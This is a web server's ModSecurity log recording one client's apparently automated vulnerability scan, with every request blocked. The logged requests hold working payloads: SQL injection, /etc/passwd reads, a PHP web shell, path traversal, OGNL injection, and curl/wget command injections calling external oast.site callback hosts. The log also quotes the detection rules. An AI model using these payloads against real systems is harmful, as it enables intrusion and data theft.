[Tue Aug 29 11:34:32.321615 2023] [:error] [pid 1235] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ReaderNo: `cat/etc/passwd > eekovulpxo.txt`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11WMCo-f0AAATTmREAAAAV"]
[Tue Aug 29 11:34:32.385338 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:query: echo md5(\\x22CVE-2020-19625\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/tests/support/stores/test_grid_filter.php"] [unique_id "ZO11WMCo-f0AAAUTiWcAAABJ"]
[Tue Aug 29 11:34:33.327409 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ' = ' found within ARGS:username: admin' or '1' = '1'; -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/dfsms/"] [unique_id "ZO11WcCo-f0AAATQXggAAAAO"]
[Tue Aug 29 11:34:35.346742 2023] [:error] [pid 1268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:PARAM. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:PARAM: 127.0.0.1 -c 0 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/PDC/ajaxreq.php"] [unique_id "ZO11W8Co-f0AAAT0eBsAAAAy"]
[Tue Aug 29 11:34:37.296719 2023] [:error] [pid 1240] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:radioBtnVal. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0a         found within ARGS:radioBtnVal: <?php\\x0a        if(isset($_GET['cmd']))\\x0a        {\\x0a            system($_GET['cmd']);\\x0a        }?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/ajaxPages/writeBrowseFilePathAjax.php"] [unique_id "ZO11XcCo-f0AAATYeDcAAAAd"]
[Tue Aug 29 11:34:38.308101 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: net/sf/jasperreports/../../../../js.jdbc.properties"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/jasperserver-pro/reportresource/reportresource/"] [unique_id "ZO11XsCo-f0AAAULx7YAAABD"]
[Tue Aug 29 11:34:38.316666 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:cmd: sudo rpm --eval '%{lua:os.execute(\\x22curl http:/cjmn8l5jmimk2adbbnlgipoofjm8pb1zt.oast.site -H 'User-Agent: j4is1X'\\x22)}'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/2Udxk4yGnOuoFAW3lL1AZ4txHQj.php"] [unique_id "ZO11XsCo-f0AAAUdm3EAAABS"]
[Tue Aug 29 11:34:38.326904 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:sessionid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within REQUEST_COOKIES:sessionid: '`wget http:/cjmn8l5jmimk2adbbnlgntykp8nd6mceh.oast.site`'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/upload"] [unique_id "ZO11XsCo-f0AAAUQ7rQAAABH"]
[Tue Aug 29 11:34:41.332962 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:orderBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:orderBy: 1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/mdiy/dict/listExcludeApp"] [unique_id "ZO11YcCo-f0AAAPDoPUAAAAP"]
[Tue Aug 29 11:34:42.343706 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO11YsCo-f0AAATSknMAAAAT"]
[Tue Aug 29 11:34:44.296569 2023] [:error] [pid 1240] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ipbackend. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ipbackend:  cat/etc/passwd ##"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/app/options.py"] [unique_id "ZO11ZMCo-f0AAATYeD8AAAAd"]
[Tue Aug 29 11:34:49.304266 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11acCo-f0AAAT9POwAAAA1"]
[Tue Aug 29 11:34:49.323278 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter_tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:filter_tag: 1)\\x22 union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5  join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5(999999999))a20 join (select 2)a21 join (select 2)a22 join ..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11acCo-f0AAASOUo4AAAAR"]
[Tue Aug 29 11:34:49.333153 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22/tic/core/resource/js/erp_data.jsp\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO11acCo-f0AAAULx8AAAABD"]
[Tue Aug 29 11:34:49.338725 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:league_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:league_id: 1' AND (SELECT 1909 FROM (SELECT(SLEEP(6)))ZiBf)-- qODp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11acCo-f0AAAQKOv4AAAAs"]
[Tue Aug 29 11:34:51.579061 2023] [:error] [pid 1239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:last_timestamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:last_timestamp: 0) UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11a8Co-f0AAATXLLoAAAAb"]
[Tue Aug 29 11:34:52.310859 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO11bMCo-f0AAATzVIQAAAAx"]
[Tue Aug 29 11:34:52.320521 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22/ found within ARGS:json: {\\x22url\\x22:\\x22/general/../../mysql5/my.ini\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/ispirit/interface/gateway.php"] [unique_id "ZO11bMCo-f0AAARjjW0AAAAL"]
[Tue Aug 29 11:34:53.375055 2023] [:error] [pid 1239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlg6j7b6btzrxhjc.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/Collector/diagnostics/trace_route"] [unique_id "ZO11bcCo-f0AAATXLL8AAAAb"]
[Tue Aug 29 11:34:53.376750 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11bcCo-f0AAATWYRoAAAAa"]
[Tue Aug 29 11:34:55.356720 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rlist[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`,  found within ARGS:rlist[]: @`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(999999999)))),@`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/comment/api/index.php"] [unique_id "ZO11b8Co-f0AAATZp6wAAAAf"]
[Tue Aug 29 11:34:56.310868 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x22<? found within ARGS:content: <?php file_put_contents(\\x222Udxlb4qUcCcHIzUrBC9eAPkNPN.php\\x22,\\x22<?php echo phpinfo();\\x22);"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11cMCo-f0AAATzVIwAAAAx"]
[Tue Aug 29 11:34:56.320154 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11cMCo-f0AAAUTiYEAAABJ"]
[Tue Aug 29 11:34:56.342873 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '='' found within ARGS:email: '=''or'@email.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/login.php"] [unique_id "ZO11cMCo-f0AAASI0EwAAAAG"]
[Tue Aug 29 11:34:57.307143 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:table_id: ' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/dashboard/view-chair-list.php"] [unique_id "ZO11ccCo-f0AAAVK0HIAAAAB"]
[Tue Aug 29 11:34:57.316101 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11ccCo-f0AAASOUpgAAAAR"]
[Tue Aug 29 11:34:57.356516 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pid: 0 echo start cat/etc/passwd echo end "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/linuxki/experimental/vis/kivis.php"] [unique_id "ZO11ccCo-f0AAAUXLjkAAABM"]
[Tue Aug 29 11:34:58.308139 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:lang: ../../thinkphp/base"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11csCo-f0AAATlLFcAAAAq"]
[Tue Aug 29 11:34:59.318414 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../vendor/topthink/think-trace/src/TraceDebug"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11c8Co-f0AAATOA@gAAAAH"]
[Tue Aug 29 11:35:01.300519 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:id: %{(#instancemanager=#application[\\x22org.apache.tomcat.InstanceManager\\x22]).(#stack=#attr[\\x22com.opensymphony.xwork2.util.ValueStack.ValueStack\\x22]).(#bean=#instancemanager.newInstance(\\x22org.apache.commons.collections.BeanMap\\x22)).(#bean.setBean(#stack)).(#context=#bean.get(\\x22context\\x22)).(#bean.setBean(#context)).(#macc=#bean.get(\\x22memberAccess\\x22)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\\x22java.util.HashSet\\x22)).(#bean.put(\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11dcCo-f0AAAUQ7sUAAABH"]
[Tue Aug 29 11:35:02.303939 2023] [:error] [pid 1286] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:blowf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:blowf: system('echo CVE-2022-1609 | rev');"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-json/am-member/license"] [unique_id "ZO11dsCo-f0AAAUGZAIAAAA@"]
